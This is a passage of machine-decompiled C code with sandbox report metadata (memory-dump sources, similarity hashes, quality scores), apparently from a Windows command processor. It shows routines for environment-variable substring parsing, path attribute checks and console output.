                                                      				void* _t199;
                                                      				signed int _t202;
                                                      				intOrPtr _t207;
                                                      				void* _t208;
                                                      				void _t212;
                                                      				signed int _t213;
                                                      				signed int _t215;
                                                      				void* _t217;
                                                      				void* _t221;
                                                      				signed int _t225;
                                                      				signed int _t227;
                                                      				signed int _t229;
                                                      				void _t234;
                                                      				intOrPtr _t235;
                                                      				void _t236;
                                                      				void* _t237;
                                                      				void* _t238;
                                                      				intOrPtr _t239;
                                                      				void _t240;
                                                      				void* _t241;
                                                      				intOrPtr _t242;
                                                      				void _t244;
                                                      				void _t245;
                                                      				void* _t247;
                                                      				void* _t248;
                                                      				void* _t253;
                                                      				signed int _t254;
                                                      				void* _t255;
                                                      				void* _t256;
                                                      				signed int _t257;
                                                      				intOrPtr _t258;
                                                      				void* _t259;
                                                      				void* _t260;
                                                      				signed int _t261;
                                                      				void* _t262;
                                                      				void* _t263;
                                                      				long _t264;
                                                      				void* _t266;
                                                      				void* _t267;
                                                      
                                                      				_push(0x38);
                                                      				_push(0x4a7352f0);
                                                      				E4A73264A(__ebx, __edi, __esi);
                                                      				_t247 = 0;
                                                      				 *(_t266 - 0x30) = 0;
                                                      				 *(_t266 - 0x28) = 0;
                                                      				 *(_t266 - 0x34) = 0;
                                                      				 *((intOrPtr*)(_t266 - 4)) = 0;
                                                      				_t117 = E4A731896(0x4000);
                                                      				 *(_t266 - 0x30) = _t117;
                                                      				if(_t117 == 0) {
                                                      					L66:
                                                      					if( *(_t266 + 8) != _t247) {
                                                      						L72:
                                                      						__imp__longjmp( *(_t266 + 8), 0xffffffff);
                                                      						L73:
                                                      						_t199 = _t247;
                                                      						_t99 = _t199 + 2; // 0x2
                                                      						_t253 = _t99;
                                                      						do {
                                                      							_t234 =  *_t199;
                                                      							_t199 = _t199 + 2;
                                                      						} while (_t234 != 0);
                                                      						_t202 = _t199 - _t253 >> 1;
                                                      						L43:
                                                      						if(_t202 < 0) {
                                                      							_t117 = 0;
                                                      							L47:
                                                      							_t254 = _t117;
                                                      							 *(_t266 - 0x38) = _t254;
                                                      							if( *( *(_t266 - 0x1c)) != 0x2c) {
                                                      								_t203 = _t247 + _t254 * 2;
                                                      								_t119 = _t247 + _t254 * 2;
                                                      								_t103 = _t119 + 2; // 0x4
                                                      								_t255 = _t103;
                                                      								while(1) {
                                                      									_t235 =  *_t119;
                                                      									_t119 = _t119 + 2;
                                                      									if(_t235 == 0) {
                                                      										break;
                                                      									}
                                                      								}
                                                      								L56:
                                                      								_t122 = _t119 - _t255 >> 1;
                                                      								L57:
                                                      								 *(_t266 - 0x20) = _t122;
                                                      								_t123 = _t247;
                                                      								_t72 = _t123 + 2; // 0x2
                                                      								_t256 = _t72;
                                                      								do {
                                                      									_t236 =  *_t123;
                                                      									_t123 = _t123 + 2;
                                                      								} while (_t236 != 0);
                                                      								_t257 =  *(_t266 - 0x20);
                                                      								E4A734B3D(_t247, (_t123 - _t256 >> 1) + 1, _t203, _t257);
                                                      								_t129 = _t247 + _t257 * 2;
                                                      								if( *_t129 != 0) {
                                                      									 *_t129 = 0;
                                                      								}
                                                      								_t130 =  *(_t266 - 0x1c);
                                                      								_t132 =  &(_t130[0]);
                                                      								 *(_t266 - 0x1c) = _t132;
                                                      								if( *_t130 !=  *((intOrPtr*)(_t266 + 0x14))) {
                                                      									 *( *(_t266 + 0x10)) =  *( *(_t266 + 0x10)) & 0x00000000;
                                                      									L14:
                                                      									 *((intOrPtr*)(_t266 - 4)) = 0xfffffffe;
                                                      									E4A7353A1();
                                                      									return E4A7313B6( *(_t266 - 0x34));
                                                      								}
                                                      								 *( *(_t266 + 0x10)) = _t132 -  *(_t266 + 0xc) >> 1;
                                                      								L22:
                                                      								 *(_t266 - 0x34) =  *(_t266 - 0x24);
                                                      								goto L14;
                                                      							}
                                                      							 *(_t266 - 0x1c) =  &(( *(_t266 - 0x1c))[0]);
                                                      							_t141 = wcstol( *(_t266 - 0x1c), _t266 - 0x1c, 0);
                                                      							 *(_t266 - 0x20) = _t141;
                                                      							if(_t141 < 0) {
                                                      								_t142 = _t247 + _t254 * 2;
                                                      								_t85 = _t142 + 2; // 0x2
                                                      								_t237 = _t85;
                                                      								do {
                                                      									_t207 =  *_t142;
                                                      									_t142 = _t142 + 2;
                                                      								} while (_t207 != 0);
                                                      								 *(_t266 - 0x20) =  *(_t266 - 0x20) + (_t142 - _t237 >> 1);
                                                      							}
                                                      							if( *(_t266 - 0x20) < 0) {
                                                      								_t146 = 0;
                                                      							} else {
                                                      								_t146 =  *(_t266 - 0x20);
                                                      							}
                                                      							 *(_t266 - 0x20) = _t146;
                                                      							_t203 = _t247 + _t254 * 2;
                                                      							_t147 = _t203;
                                                      							_t238 = _t147 + 2;
                                                      							do {
                                                      								_t258 =  *_t147;
                                                      								_t147 = _t147 + 2;
                                                      							} while (_t258 != 0);
                                                      							if( *(_t266 - 0x20) < _t147 - _t238 >> 1) {
                                                      								_t122 =  *(_t266 - 0x20);
                                                      								goto L57;
                                                      							}
                                                      							_t151 = _t203;
                                                      							_t255 = _t151 + 2;
                                                      							do {
                                                      								_t239 =  *_t151;
                                                      								_t151 = _t151 + 2;
                                                      							} while (_t239 != 0);
                                                      							goto L56;
                                                      						}
                                                      						_t208 = _t247;
                                                      						_t55 = _t208 + 2; // 0x2
                                                      						_t259 = _t55;
                                                      						do {
                                                      							_t240 =  *_t208;
                                                      							_t208 = _t208 + 2;
                                                      						} while (_t240 != 0);
                                                      						if(_t117 >= _t208 - _t259 >> 1) {
                                                      							_t153 = _t247;
                                                      							_t100 = _t153 + 2; // 0x2
                                                      							_t241 = _t100;
                                                      							do {
                                                      								_t212 =  *_t153;
                                                      								_t153 = _t153 + 2;
                                                      							} while (_t212 != 0);
                                                      							_t117 = _t153 - _t241 >> 1;
                                                      						}
                                                      						goto L47;
                                                      					}
                                                      					L64:
                                                      					 *( *(_t266 + 0x10)) = _t247;
                                                      					goto L14;
                                                      				}
                                                      				_t196 =  *(_t266 + 0xc);
                                                      				_t157 = _t196;
                                                      				_t242 =  *((intOrPtr*)(_t266 + 0x14));
                                                      				while(1) {
                                                      					 *(_t266 - 0x1c) = _t157;
                                                      					_t213 =  *_t157 & 0x0000ffff;
                                                      					if(_t213 == _t247 || _t213 == _t242 ||  *0x4a754081 != 0 && _t213 == 0x3a && _t157[0] != _t242) {
                                                      						break;
                                                      					}
                                                      					_t157 =  &(_t157[0]);
                                                      				}
                                                      				if( *_t157 == _t247 || _t157 == _t196) {
                                                      					goto L64;
                                                      				} else {
                                                      					_t260 = (_t157 - _t196 >> 1) + 1;
                                                      					_t117 = E4A731896(_t260 + _t260);
                                                      					 *(_t266 - 0x28) = _t117;
                                                      					if(_t117 == _t247) {
                                                      						goto L66;
                                                      					}
                                                      					_t12 = _t260 - 1; // 0x664a7353
                                                      					E4A734B3D( *(_t266 - 0x28), _t260, _t196, _t12);
                                                      					_t261 =  *( *(_t266 - 0x1c)) & 0x0000ffff;
                                                      					 *(_t266 - 0x1c) =  &(( *(_t266 - 0x1c))[0]);
                                                      					_t247 = E4A732070( *(_t266 - 0x28));
                                                      					 *(_t266 - 0x24) = _t247;
                                                      					if( *0x4a754081 == 0 || _t261 != 0x3a || _t247 == 0) {
                                                      						 *( *(_t266 + 0x10)) =  *(_t266 - 0x1c) - _t196 >> 1;
                                                      						 *(_t266 - 0x34) = _t247;
                                                      						goto L14;
                                                      					} else {
                                                      						_t169 =  *(_t266 - 0x1c);
                                                      						_t215 =  *_t169 & 0x0000ffff;
                                                      						if(_t215 == 0x7e) {
                                                      							_t171 =  &(_t169[0]);
                                                      							 *(_t266 - 0x1c) = _t171;
                                                      							_t117 = wcstol(_t171, _t266 - 0x1c, 0);
                                                      							_t267 = _t267 + 0xc;
                                                      							 *(_t266 - 0x38) = _t117;
                                                      							if(_t117 >= 0) {
                                                      								L39:
                                                      								_t217 = _t247;
                                                      								_t54 = _t217 + 2; // 0x2
                                                      								_t262 = _t54;
                                                      								do {
                                                      									_t244 =  *_t217;
                                                      									_t217 = _t217 + 2;
                                                      								} while (_t244 != 0);
                                                      								if(_t117 >= _t217 - _t262 >> 1) {
                                                      									goto L73;
                                                      								}
                                                      								_t202 = _t117;
                                                      								goto L43;
                                                      							}
                                                      							_t221 = _t247;
                                                      							_t52 = _t221 + 2; // 0x2
                                                      							_t263 = _t52;
                                                      							do {
                                                      								_t245 =  *_t221;
                                                      								_t221 = _t221 + 2;
                                                      							} while (_t245 != 0);
                                                      							_t117 = _t117 + (_t221 - _t263 >> 1);
                                                      							 *(_t266 - 0x38) = _t117;
                                                      							goto L39;
                                                      						}
                                                      						if(_t215 == 0x2a) {
                                                      							_t169 =  &(_t169[0]);
                                                      							 *(_t266 - 0x1c) = _t169;
                                                      							 *((intOrPtr*)(_t266 - 0x40)) = 1;
                                                      						} else {
                                                      							 *((intOrPtr*)(_t266 - 0x40)) = 0;
                                                      						}
                                                      						 *(_t266 - 0x3c) = _t169;
                                                      						while(1) {
                                                      							_t225 =  *_t169 & 0x0000ffff;
                                                      							if(_t225 == 0 || _t225 == 0x3d) {
                                                      								break;
                                                      							}
                                                      							_t169 =  &(_t169[0]);
                                                      							 *(_t266 - 0x1c) = _t169;
                                                      						}
                                                      						if( *_t169 == 0) {
                                                      							L86:
                                                      							 *( *(_t266 + 0x10)) = 0;
                                                      							goto L14;
                                                      						}
                                                      						_t227 = _t169 -  *(_t266 - 0x3c);
                                                      						_t228 = _t227 >> 1;
                                                      						 *(_t266 - 0x2c) = _t227 >> 1;
                                                      						if(_t227 == 0) {
                                                      							if( *(_t266 + 8) == 0) {
                                                      								goto L86;
                                                      							}
                                                      							_t117 = E4A736D44(_t228, 0x234a, 1, _t169);
                                                      							_t267 = _t267 + 0xc;
                                                      							goto L72;
                                                      						}
                                                      						_t175 =  &(_t169[0]);
                                                      						 *(_t266 - 0x1c) = _t175;
                                                      						 *(_t266 + 8) = _t175;
                                                      						while(1) {
                                                      							_t229 =  *_t175 & 0x0000ffff;
                                                      							if(_t229 == 0 || _t229 ==  *((intOrPtr*)(_t266 + 0x14))) {
                                                      								break;
                                                      							}
                                                      							_t175 =  &(_t175[0]);
                                                      							 *(_t266 - 0x1c) = _t175;
                                                      						}
                                                      						if( *_t175 == 0) {
                                                      							goto L86;
                                                      						}
                                                      						_t177 =  &(_t175[0]);
                                                      						 *(_t266 - 0x1c) = _t177;
                                                      						_t198 = _t175 -  *(_t266 + 8) >> 1;
                                                      						 *( *(_t266 + 0x10)) = _t177 -  *(_t266 + 0xc) >> 1;
                                                      						if( *_t247 == 0) {
                                                      							goto L22;
                                                      						}
                                                      						_t248 =  *(_t266 - 0x24);
                                                      						_t264 =  *(_t266 - 0x30);
                                                      						_t181 = E4A73185A(_t264, 0x2000, _t248);
                                                      						 *(_t266 - 0x48) = _t264;
                                                      						 *(_t266 - 0x44) = _t248;
                                                      						while(1) {
                                                      							L20:
                                                      							__imp___wcsnicmp(_t264,  *(_t266 - 0x3c),  *(_t266 - 0x2c));
                                                      							_t267 = _t267 + 0xc;
                                                      							if(_t181 != 0) {
                                                      								break;
                                                      							}
                                                      							if( *((intOrPtr*)(_t266 - 0x40)) != _t181) {
                                                      								memcpy( *(_t266 - 0x24),  *(_t266 + 8), _t198 + _t198);
                                                      								E4A73185A( *(_t266 - 0x24) + _t198 + _t198, 0x2000 - _t198, _t264 +  *(_t266 - 0x2c) * 2);
                                                      								goto L22;
                                                      							}
                                                      							memcpy(_t248,  *(_t266 + 8), _t198 + _t198);
                                                      							_t267 = _t267 + 0xc;
                                                      							_t248 = _t248 + _t198 + _t198;
                                                      							 *(_t266 - 0x44) = _t248;
                                                      							_t181 =  *(_t266 - 0x2c);
                                                      							_t264 = _t264 + _t181 * 2;
                                                      							 *(_t266 - 0x48) = _t264;
                                                      						}
                                                      						_t181 =  *_t264;
                                                      						 *_t248 = _t181;
                                                      						_t248 = _t248 + 2;
                                                      						 *(_t266 - 0x44) = _t248;
                                                      						_t264 = _t264 + 2;
                                                      						 *(_t266 - 0x48) = _t264;
                                                      						if( *((short*)(_t248 - 2)) != 0) {
                                                      							goto L20;
                                                      						}
                                                      						goto L22;
                                                      					}
                                                      				}
                                                      			}
                                                      0x4a73f375
                                                      0x4a746b75
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746b7f
                                                      0x4a746b84
                                                      0x00000000
                                                      0x4a746b84
                                                      0x4a73f37c
                                                      0x4a73f37d
                                                      0x4a73f380
                                                      0x4a73f383
                                                      0x4a73f383
                                                      0x4a73f389
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73f392
                                                      0x4a73f393
                                                      0x4a73f393
                                                      0x4a73f39b
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73f3a4
                                                      0x4a73f3a5
                                                      0x4a73f3ad
                                                      0x4a73f3b7
                                                      0x4a73f3bc
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73f3be
                                                      0x4a73f3c8
                                                      0x4a73f3cc
                                                      0x4a73f3d1
                                                      0x4a73f3d4
                                                      0x4a73f313
                                                      0x4a73f313
                                                      0x4a73f31a
                                                      0x4a73f320
                                                      0x4a73f325
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73fe4d
                                                      0x4a746b96
                                                      0x4a746bb3
                                                      0x00000000
                                                      0x4a746bb3
                                                      0x4a73fe5b
                                                      0x4a73fe60
                                                      0x4a73fe66
                                                      0x4a73fe68
                                                      0x4a73fe6b
                                                      0x4a73fe6e
                                                      0x4a73fe71
                                                      0x4a73fe71
                                                      0x4a73f32b
                                                      0x4a73f32e
                                                      0x4a73f332
                                                      0x4a73f333
                                                      0x4a73f337
                                                      0x4a73f338
                                                      0x4a73f340
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73f340
                                                      0x4a73536a

                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: 473a2b1a1ea05b404705f50cc651cccc94c034638bf42130151db92cf7ffd901
                                                      • Instruction ID: 1c05453909b030b7102a069425f51adf248a63ed3a89d35a0201723744f0e740
                                                      • Opcode Fuzzy Hash: 473a2b1a1ea05b404705f50cc651cccc94c034638bf42130151db92cf7ffd901
                                                      • Instruction Fuzzy Hash: FCD1D471D18A06EFCF64DF68C8846ED7BB4EF09344B124169D852EB292E7709A4ACB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E4A73944C(void* __ebx, signed int _a4) {
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				int _v16;
                                                      				signed int __edi;
                                                      				WCHAR** __esi;
                                                      				signed int _t34;
                                                      				signed int _t35;
                                                      				signed int _t39;
                                                      				signed int _t40;
                                                      				void* _t41;
                                                      				signed int _t43;
                                                      				signed int _t45;
                                                      				signed int _t47;
                                                      				signed int* _t50;
                                                      				void* _t54;
                                                      
                                                      				_t41 = __ebx;
                                                      				 *0x4a754128 =  *0x4a754128 & 0x00000000;
                                                      				_t50 = _a4;
                                                      				_t43 =  *_t50;
                                                      				_v12 = 0x4a754874;
                                                      				_t45 = _t43 + 2;
                                                      				do {
                                                      					__di =  *__eax;
                                                      					__eax = __eax + 1;
                                                      					__eax = __eax + 1;
                                                      					__eflags = __di;
                                                      				} while (__di != 0);
                                                      				__eax = __eax - __edx;
                                                      				_push(__ebx);
                                                      				_v8 = __eax;
                                                      				__edi = E4A732ED1(__ecx);
                                                      				__eflags =  *__edi - 0x3a;
                                                      				if( *__edi == 0x3a) {
                                                      					__eflags = _v8 - 2;
                                                      					if(_v8 <= 2) {
                                                      						goto L4;
                                                      					}
                                                      					__ebx = SetErrorMode;
                                                      					__eax = 0;
                                                      					 *__edi = __ax;
                                                      					__edi = __edi - 1;
                                                      					__edi = __edi - 1;
                                                      					_v16 = SetErrorMode(0);
                                                      					__eax = E4A7339EF( *__esi, 0x8000);
                                                      					_a4 = __eax;
                                                      					__eflags = __eax - 0xffffffff;
                                                      					if(__eax == 0xffffffff) {
                                                      						L44:
                                                      						__edi = __edi + 1;
                                                      						__edi = __edi + 1;
                                                      						__eax = 0x3a;
                                                      						 *__edi = __ax;
                                                      						__eflags =  *0x4a754098 - 4;
                                                      						if( *0x4a754098 != 4) {
                                                      							__eax = E4A736D44(__ecx, 0x236b, 1,  *__esi);
                                                      						} else {
                                                      							__eflags =  *0x4a7540ec;
                                                      							if( *0x4a7540ec == 0) {
                                                      								__eax = E4A736D44(__ecx, 0x236b, 1,  *__esi);
                                                      							}
                                                      							 *0x4a7540f0 = 1;
                                                      						}
                                                      						__eflags = _a4 - 0xffffffff;
                                                      						L50:
                                                      						if(__eflags == 0) {
                                                      							L52:
                                                      							__eax = SetErrorMode(_v16);
                                                      							goto L4;
                                                      						}
                                                      						L51:
                                                      						__eax = E4A733AB3(_a4);
                                                      						goto L52;
                                                      					}
                                                      					__eax = E4A733B03(__eax, __ecx, __eax);
                                                      					__eflags = __eax;
                                                      					if(__eax != 0) {
                                                      						L42:
                                                      						__eax = E4A733B03(__eax, __ecx, _a4);
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							goto L51;
                                                      						}
                                                      						__eflags = __eax;
                                                      						goto L50;
                                                      					}
                                                      					__eax = E4A736BEA(__eax, _a4);
                                                      					__eflags = __eax;
                                                      					if(__eax == 0) {
                                                      						goto L44;
                                                      					}
                                                      					goto L42;
                                                      				}
                                                      				L4:
                                                      				__esi[6] = E4A732041(0x250);
                                                      				__ecx =  *__edi & 0x0000ffff;
                                                      				__ax =  *0x4a770664; // 0x5c
                                                      				_a4 =  *__edi & 0x0000ffff;
                                                      				__eflags = __cx - __ax;
                                                      				if(__cx == __ax) {
                                                      					L29:
                                                      					__ax =  *0x4a770664; // 0x5c
                                                      					__eflags = _a4 - __ax;
                                                      					if(_a4 == __ax) {
                                                      						_v12 = 0x4a754876;
                                                      					}
                                                      					__eax = E4A740BC9( *__esi);
                                                      					__eflags = __al;
                                                      					if(__al == 0) {
                                                      						__edi = _v8;
                                                      						__ebx =  *__esi;
                                                      						__edi = _v8 + 5;
                                                      						__eflags = __edi;
                                                      						__eax = __edi + __edi;
                                                      						 *__esi = E4A732041(__edi + __edi);
                                                      						__eax = E4A7320A9(__esi,  *__esi, __edi, _v12);
                                                      					}
                                                      					__eax = __esi[6];
                                                      					 *(__esi[6]) = 0x10;
                                                      					L14:
                                                      					__edx =  *__esi;
                                                      					0 = 1;
                                                      					__edi = 0;
                                                      					__eflags = 0;
                                                      					__ecx =  *__esi;
                                                      					while(1) {
                                                      						_t34 =  *_t43 & 0x0000ffff;
                                                      						if(_t34 == 0) {
                                                      							break;
                                                      						}
                                                      						_t54 = _t34 -  *0x4a770664; // 0x5c
                                                      						if(_t54 == 0) {
                                                      							L1:
                                                      							_t47 = _t43;
                                                      							L18:
                                                      							_t43 = _t43 + 2;
                                                      							_t41 = _t41 + 1;
                                                      							continue;
                                                      						}
                                                      						if(_t34 == 0x3a) {
                                                      							__eflags = _t41 - 2;
                                                      							if(_t41 != 2) {
                                                      								goto L18;
                                                      							}
                                                      							goto L1;
                                                      						}
                                                      						goto L18;
                                                      					}
                                                      					_t50[3] = _t47;
                                                      					__eflags = _t47;
                                                      					if(_t47 == 0) {
                                                      						_t50[4] = _t45;
                                                      						_t47 = _t45;
                                                      					} else {
                                                      						__eflags =  *_t47 - _t34;
                                                      						_t10 = _t47 + 2; // 0x2
                                                      						_t40 = _t10;
                                                      						if( *_t47 == _t34) {
                                                      							_t40 = _t47;
                                                      						}
                                                      						_t50[4] = _t40;
                                                      					}
                                                      					_t35 = E4A7318EB(_t47, 0x2a);
                                                      					__eflags = _t35;
                                                      					if(_t35 != 0) {
                                                      						L28:
                                                      						_t50[7] = _t50[7] | 0x00000008;
                                                      						 *0x4a7540f4 = 1;
                                                      						goto L24;
                                                      					} else {
                                                      						_t39 = E4A7318EB(_t47, 0x3f);
                                                      						__eflags = _t39;
                                                      						if(_t39 != 0) {
                                                      							goto L28;
                                                      						}
                                                      						L24:
                                                      						_t50[5] = E4A7318EB(_t47, 0x2e);
                                                      						__eflags = 1;
                                                      						return 1;
                                                      					}
                                                      				}
                                                      				__eax = __ax & 0x0000ffff;
                                                      				__edi = E4A732148( *__esi, __ax & 0x0000ffff);
                                                      				__eflags = __edi;
                                                      				if(__edi == 0) {
                                                      					__edi =  *__esi;
                                                      					__eax = __edi;
                                                      					_t31 = __eax + 2; // 0x2
                                                      					__edx = _t31;
                                                      					do {
                                                      						__cx =  *__eax;
                                                      						__eax = __eax + 1;
                                                      						__eax = __eax + 1;
                                                      						__eflags = __cx;
                                                      					} while (__cx != 0);
                                                      					__eax = __eax - __edx;
                                                      					__eax = __eax >> 1;
                                                      					__eflags = __eax - 2;
                                                      					if(__eax >= 2) {
                                                      						__eflags =  *((short*)(__edi + 2)) - 0x3a;
                                                      						if( *((short*)(__edi + 2)) == 0x3a) {
                                                      							__edi = __edi + 4;
                                                      						}
                                                      					}
                                                      					goto L7;
                                                      				} else {
                                                      					__edi = __edi + 1;
                                                      					__edi = __edi + 1;
                                                      					__eflags = __edi;
                                                      					L7:
                                                      					__ebx = __imp___wcsicmp;
                                                      					__eax =  *__ebx(E4A732EC4);
                                                      					__ecx = __edi;
                                                      					_pop(__ecx);
                                                      					__eflags = __eax;
                                                      					if(__eax == 0) {
                                                      						goto L29;
                                                      					}
                                                      					__eax =  *__ebx(E4A732EBC);
                                                      					__ecx = __edi;
                                                      					_pop(__ecx);
                                                      					__eflags = __eax;
                                                      					if(__eax == 0) {
                                                      						goto L29;
                                                      					}
                                                      					__eflags =  *0x4a754098 - 4;
                                                      					if( *0x4a754098 == 4) {
                                                      						__eflags =  *0x4a7540e8 - 1;
                                                      						if( *0x4a7540e8 == 1) {
                                                      							goto L10;
                                                      						}
                                                      						__eflags =  *0x4a75409c - 1;
                                                      						if( *0x4a75409c != 1) {
                                                      							goto L14;
                                                      						}
                                                      						 *0x4a75409c =  *0x4a75409c & 0x00000000;
                                                      					}
                                                      					L10:
                                                      					__ebx = GetFileAttributesW( *__esi);
                                                      					__eflags = __ebx - 0xffffffff;
                                                      					if(__ebx == 0xffffffff) {
                                                      						 *0x4a754128 = GetLastError();
                                                      					} else {
                                                      						 *0x4a754128 =  *0x4a754128 & 0x00000000;
                                                      						__eflags =  *0x4a754128;
                                                      					}
                                                      					__eflags = __ebx - 0xffffffff;
                                                      					if(__ebx != 0xffffffff) {
                                                      						__eflags = __bl & 0x00000010;
                                                      						if((__bl & 0x00000010) != 0) {
                                                      							goto L29;
                                                      						}
                                                      					}
                                                      					goto L14;
                                                      				}
                                                      			}


















                                                      0x4a73952a
                                                      0x4a73952a
                                                      0x4a73952e
                                                      0x4a73952f
                                                      0x4a73952f
                                                      0x4a739531
                                                      0x4a739533
                                                      0x4a739533
                                                      0x4a739539
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73953b
                                                      0x4a739542
                                                      0x4a739440
                                                      0x4a739440
                                                      0x4a73954e
                                                      0x4a73954f
                                                      0x4a739550
                                                      0x00000000
                                                      0x4a739550
                                                      0x4a73954c
                                                      0x4a7395a2
                                                      0x4a7395a5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7395a7
                                                      0x00000000
                                                      0x4a73954c
                                                      0x4a739553
                                                      0x4a739557
                                                      0x4a739559
                                                      0x4a740bba
                                                      0x4a740bbd
                                                      0x4a73955f
                                                      0x4a73955f
                                                      0x4a739562
                                                      0x4a739562
                                                      0x4a739565
                                                      0x4a74970d
                                                      0x4a74970d
                                                      0x4a73956b
                                                      0x4a73956b
                                                      0x4a739571
                                                      0x4a739576
                                                      0x4a739578
                                                      0x4a739624
                                                      0x4a739624
                                                      0x4a739628
                                                      0x00000000
                                                      0x4a73957e
                                                      0x4a739581
                                                      0x4a739586
                                                      0x4a739588
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73958e
                                                      0x4a739596
                                                      0x4a73959c
                                                      0x4a73959f
                                                      0x4a73959f
                                                      0x4a739578
                                                      0x4a7394b4
                                                      0x4a7394bf
                                                      0x4a7394c1
                                                      0x4a7394c3
                                                      0x4a7496dc
                                                      0x4a7496de
                                                      0x4a7496e0
                                                      0x4a7496e0
                                                      0x4a7496e3
                                                      0x4a7496e3
                                                      0x4a7496e6
                                                      0x4a7496e7
                                                      0x4a7496e8
                                                      0x4a7496e8
                                                      0x4a7496ed
                                                      0x4a7496ef
                                                      0x4a7496f1
                                                      0x4a7496f4
                                                      0x4a7496fa
                                                      0x4a7496ff
                                                      0x4a749705
                                                      0x4a749705
                                                      0x4a7496ff
                                                      0x00000000
                                                      0x4a7394c9
                                                      0x4a7394c9
                                                      0x4a7394ca
                                                      0x4a7394ca
                                                      0x4a7394cb
                                                      0x4a7394cb
                                                      0x4a7394d7
                                                      0x4a7394d9
                                                      0x4a7394da
                                                      0x4a7394db
                                                      0x4a7394dd
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7394e9
                                                      0x4a7394eb
                                                      0x4a7394ec
                                                      0x4a7394ed
                                                      0x4a7394ef
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7394f5
                                                      0x4a7394fc
                                                      0x4a7411e4
                                                      0x4a7411eb
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7411f1
                                                      0x4a7411f8
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7411fe
                                                      0x4a7411fe
                                                      0x4a739502
                                                      0x4a73950a
                                                      0x4a73950c
                                                      0x4a73950f
                                                      0x4a73961a
                                                      0x4a739515
                                                      0x4a739515
                                                      0x4a739515
                                                      0x4a739515
                                                      0x4a73951c
                                                      0x4a73951f
                                                      0x4a739521
                                                      0x4a739524
                                                      0x00000000
                                                      0x00000000
                                                      0x4a739524
                                                      0x00000000
                                                      0x4a73951f

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _wcsicmp$AttributesFile
                                                      • String ID:
                                                      • API String ID: 2635507994-0
                                                      • Opcode ID: a3a7d727d62d315c931a2a2ddeb0b88fed2f8242c0128228fe37d9c534b337ba
                                                      • Instruction ID: fc0d2637960914e1e9f32fc27a57a3609532a1241a78d29424513301391fc82d
                                                      • Opcode Fuzzy Hash: a3a7d727d62d315c931a2a2ddeb0b88fed2f8242c0128228fe37d9c534b337ba
                                                      • Instruction Fuzzy Hash: 1371577450DA02EAEB708F20CC55AA67FB9EF41324F234129E895CB993E770C98DCB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 41%
                                                      			E4A73A995(void* __ecx, intOrPtr _a4) {
                                                      				void _v8;
                                                      				intOrPtr _v12;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				intOrPtr _t37;
                                                      				void* _t38;
                                                      				long _t39;
                                                      				void* _t57;
                                                      				int _t58;
                                                      				void* _t61;
                                                      				void* _t63;
                                                      				int _t68;
                                                      				void* _t78;
                                                      				void* _t79;
                                                      				void* _t81;
                                                      				void* _t85;
                                                      				intOrPtr _t88;
                                                      				signed int _t92;
                                                      				signed int _t95;
                                                      
                                                      				_t72 = __ecx;
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_t68);
                                                      				_t88 = _a4;
                                                      				if(E4A734490(E4A73AA4F(_t88), 1) != 0) {
                                                      					_t84 =  *(_t88 + 0x10);
                                                      					_t37 = _t84 +  *(_t88 + 8) * 2;
                                                      					_v12 = _t37;
                                                      					while(_t84 < _t37) {
                                                      						_t68 = _t84;
                                                      						if(_t84 >= _t37) {
                                                      							goto L3;
                                                      						} else {
                                                      							while( *_t68 != 0x2022) {
                                                      								_t68 = _t68 + 2;
                                                      								if(_t68 < _t37) {
                                                      									continue;
                                                      								}
                                                      								break;
                                                      							}
                                                      							if(_t68 == _t84) {
                                                      								goto L19;
                                                      							} else {
                                                      								_t63 =  &_v8;
                                                      								_t95 = _t68 - _t84 >> 1;
                                                      								__imp___get_osfhandle(_t84, _t95, _t63, 0);
                                                      								_t72 = 1;
                                                      								if(WriteConsoleW(_t63, ??, ??, ??, ??) == 0 || _v8 != _t95) {
                                                      									L27:
                                                      									_t88 = _a4;
                                                      									goto L28;
                                                      								} else {
                                                      									_t88 = _a4;
                                                      									_t84 = _t68;
                                                      									L19:
                                                      									while(_t68 < _v12) {
                                                      										if( *_t68 == 0x2022) {
                                                      											_t68 = _t68 + 2;
                                                      											continue;
                                                      										}
                                                      										break;
                                                      									}
                                                      									if(_t68 == _t84) {
                                                      										L24:
                                                      										_t37 = _v12;
                                                      										continue;
                                                      									} else {
                                                      										E4A74EA77(_t88);
                                                      										_t57 =  &_v8;
                                                      										_t92 = _t68 - _t84 >> 1;
                                                      										__imp___get_osfhandle(_t84, _t92, _t57, 0);
                                                      										_t72 = 1;
                                                      										_t58 = WriteConsoleW(_t57, ??, ??, ??, ??);
                                                      										_t84 = _t58;
                                                      										_t59 = E4A731605();
                                                      										if(_t58 == 0 || _v8 != _t92) {
                                                      											goto L27;
                                                      										} else {
                                                      											_t88 = _a4;
                                                      											_t84 = _t68;
                                                      											goto L24;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L36:
                                                      					}
                                                      				} else {
